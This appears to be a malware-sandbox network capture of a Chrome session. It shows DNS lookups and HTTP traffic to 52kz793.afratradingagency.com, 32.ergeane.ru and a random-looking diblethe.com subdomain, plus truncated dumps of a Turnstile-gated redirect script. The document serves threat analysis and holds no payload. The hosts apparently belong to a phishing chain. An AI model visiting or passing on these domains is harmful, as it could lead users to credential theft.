                                                                                                                                                                                                                                  Dec 18, 2024 20:28:28.249511957 CET1.1.1.1192.168.2.160xcc57No error (0)5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:28.249511957 CET1.1.1.1192.168.2.160xcc57No error (0)5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:28.249511957 CET1.1.1.1192.168.2.160xcc57No error (0)5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:28.249511957 CET1.1.1.1192.168.2.160xcc57No error (0)5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:28.249511957 CET1.1.1.1192.168.2.160xcc57No error (0)5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:28.250205994 CET1.1.1.1192.168.2.160xe825No error (0)5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.933804989 CET1.1.1.1192.168.2.160xaa62No error (0)docs.google.com142.250.181.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.933900118 CET1.1.1.1192.168.2.160x9fe2No error (0)5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.933900118 CET1.1.1.1192.168.2.160x9fe2No error (0)5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.933900118 CET1.1.1.1192.168.2.160x9fe2No error (0)5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.933900118 CET1.1.1.1192.168.2.160x9fe2No error (0)5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.933900118 CET1.1.1.1192.168.2.160x9fe2No error (0)5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.933900118 CET1.1.1.1192.168.2.160x9fe2No error (0)5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.933900118 CET1.1.1.1192.168.2.160x9fe2No error (0)5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.934039116 CET1.1.1.1192.168.2.160xe88cNo error (0)5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:52.490242958 CET1.1.1.1192.168.2.160xbe68No error (0)accounts.youtube.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:52.492554903 CET1.1.1.1192.168.2.160x1126No error (0)accounts.youtube.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:52.492554903 CET1.1.1.1192.168.2.160x1126No error (0)www3.l.google.com172.217.19.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:57.253360033 CET1.1.1.1192.168.2.160x4980No error (0)play.google.com142.250.181.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:01.620069981 CET1.1.1.1192.168.2.160x26b4No error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:01.620110035 CET1.1.1.1192.168.2.160x8bf3No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:02.494034052 CET1.1.1.1192.168.2.160xf138No error (0)play.google.com142.250.181.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:18.419554949 CET1.1.1.1192.168.2.160xcc60No error (0)cdn.prod.website-files.com104.18.161.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:18.419554949 CET1.1.1.1192.168.2.160xcc60No error (0)cdn.prod.website-files.com104.18.160.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:18.423074961 CET1.1.1.1192.168.2.160xf6c2No error (0)cdn.prod.website-files.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:24.173302889 CET1.1.1.1192.168.2.160x878No error (0)support.google.com172.217.19.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.300946951 CET1.1.1.1192.168.2.160x3159No error (0)lh3.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.300946951 CET1.1.1.1192.168.2.160x3159No error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.708967924 CET1.1.1.1192.168.2.160x2799No error (0)play.google.com142.250.181.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.713340044 CET1.1.1.1192.168.2.160x597aNo error (0)support.google.com172.217.19.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.206448078 CET1.1.1.1192.168.2.160x6323No error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.207519054 CET1.1.1.1192.168.2.160x7bb9No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.347678900 CET1.1.1.1192.168.2.160xe1eNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.348151922 CET1.1.1.1192.168.2.160x1c2cNo error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:45.216351986 CET1.1.1.1192.168.2.160x1d2fNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:45.216351986 CET1.1.1.1192.168.2.160x1d2fNo error (0)plus.l.google.com142.250.181.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:45.216367006 CET1.1.1.1192.168.2.160xbd19No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  • 52kz793.afratradingagency.com
                                                                                                                                                                                                                                  • https:
                                                                                                                                                                                                                                    • challenges.cloudflare.com
                                                                                                                                                                                                                                    • 32.ergeane.ru
                                                                                                                                                                                                                                    • code.jquery.com
                                                                                                                                                                                                                                    • cdn.prod.website-files.com
                                                                                                                                                                                                                                    • 5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com
                                                                                                                                                                                                                                    • docs.google.com
                                                                                                                                                                                                                                    • www.google.com
                                                                                                                                                                                                                                    • play.google.com
                                                                                                                                                                                                                                  • a.nel.cloudflare.com
                                                                                                                                                                                                                                  • apis.google.com
                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  0192.168.2.1649705192.185.195.2144436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:27:42 UTC672OUTGET / HTTP/1.1
                                                                                                                                                                                                                                  Host: 52kz793.afratradingagency.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:27:43 UTC208INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:27:42 GMT
                                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                                                                                  Connection: Upgrade, close
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  2024-12-18 19:27:43 UTC624INData Raw: 32 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 6a
                                                                                                                                                                                                                                  Data Ascii: 264<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Document</title><style> div { display: flex; align-items: center; j


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  1192.168.2.1649706192.185.195.2144436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:27:43 UTC550OUTGET /main.js HTTP/1.1
                                                                                                                                                                                                                                  Host: 52kz793.afratradingagency.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://52kz793.afratradingagency.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:27:43 UTC267INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:27:43 GMT
                                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                                                                                  Connection: Upgrade, close
                                                                                                                                                                                                                                  Last-Modified: Wed, 18 Dec 2024 15:35:58 GMT
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Content-Length: 320
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                                                                  2024-12-18 19:27:43 UTC320INData Raw: 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 74 75 72 6e 73 74 69 6c 65 2e 72 65 6e 64 65 72 28 27 23 6d 79 57 69 64 67 65 74 27 2c 20 7b 0d 0a 20 20 20 20 20 20 20 20 73 69 74 65 6b 65 79 3a 20 27 30 78 34 41 41 41 41 41 41 41 33 43 6a 51 41 52 46 62 6a 45 56 74 55 34 27 2c 0d 0a 20 20 20 20 20 20 20 20 63 61 6c 6c 62 61 63 6b 3a 20 66 75 6e 63 74 69 6f 6e 28 74 6f 6b 65 6e 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 43 68 61 6c 6c 65 6e 67 65 20 53 75 63 63 65 73 73 20 24 7b 74 6f 6b 65 6e 7d 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65
                                                                                                                                                                                                                                  Data Ascii: window.onloadTurnstileCallback = function () { turnstile.render('#myWidget', { sitekey: '0x4AAAAAAA3CjQARFbjEVtU4', callback: function(token) { console.log('Challenge Success ${token}'); window.location.hre


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  2192.168.2.1649708104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:27:44 UTC588OUTGET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://52kz793.afratradingagency.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:27:44 UTC386INHTTP/1.1 302 Found
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:27:44 GMT
                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                  cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  location: /turnstile/v0/b/787bc399e22f/api.js
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418d50dec743b1-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  3192.168.2.1649709192.185.195.2144436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:27:44 UTC360OUTGET /main.js HTTP/1.1
                                                                                                                                                                                                                                  Host: 52kz793.afratradingagency.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:27:45 UTC267INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:27:45 GMT
                                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                                                                                  Connection: Upgrade, close
                                                                                                                                                                                                                                  Last-Modified: Wed, 18 Dec 2024 15:35:58 GMT
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Content-Length: 320
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                                                                  2024-12-18 19:27:45 UTC320INData Raw: 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 74 75 72 6e 73 74 69 6c 65 2e 72 65 6e 64 65 72 28 27 23 6d 79 57 69 64 67 65 74 27 2c 20 7b 0d 0a 20 20 20 20 20 20 20 20 73 69 74 65 6b 65 79 3a 20 27 30 78 34 41 41 41 41 41 41 41 33 43 6a 51 41 52 46 62 6a 45 56 74 55 34 27 2c 0d 0a 20 20 20 20 20 20 20 20 63 61 6c 6c 62 61 63 6b 3a 20 66 75 6e 63 74 69 6f 6e 28 74 6f 6b 65 6e 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 43 68 61 6c 6c 65 6e 67 65 20 53 75 63 63 65 73 73 20 24 7b 74 6f 6b 65 6e 7d 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65
                                                                                                                                                                                                                                  Data Ascii: window.onloadTurnstileCallback = function () { turnstile.render('#myWidget', { sitekey: '0x4AAAAAAA3CjQARFbjEVtU4', callback: function(token) { console.log('Challenge Success ${token}'); window.location.hre


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  4192.168.2.1649712104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:27:46 UTC572OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://52kz793.afratradingagency.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:27:46 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:27:46 GMT
                                                                                                                                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                  Content-Length: 47692
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  accept-ranges: bytes
                                                                                                                                                                                                                                  last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                                                                                                                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418d5b5d9932e8-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:27:46 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                  Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                                                                                                                                                  2024-12-18 19:27:46 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                                                                                                  Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                                                                                                  2024-12-18 19:27:46 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                                                                                                                                                  Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                                                                                                                                                  2024-12-18 19:27:46 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                                                                                                                                                  Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
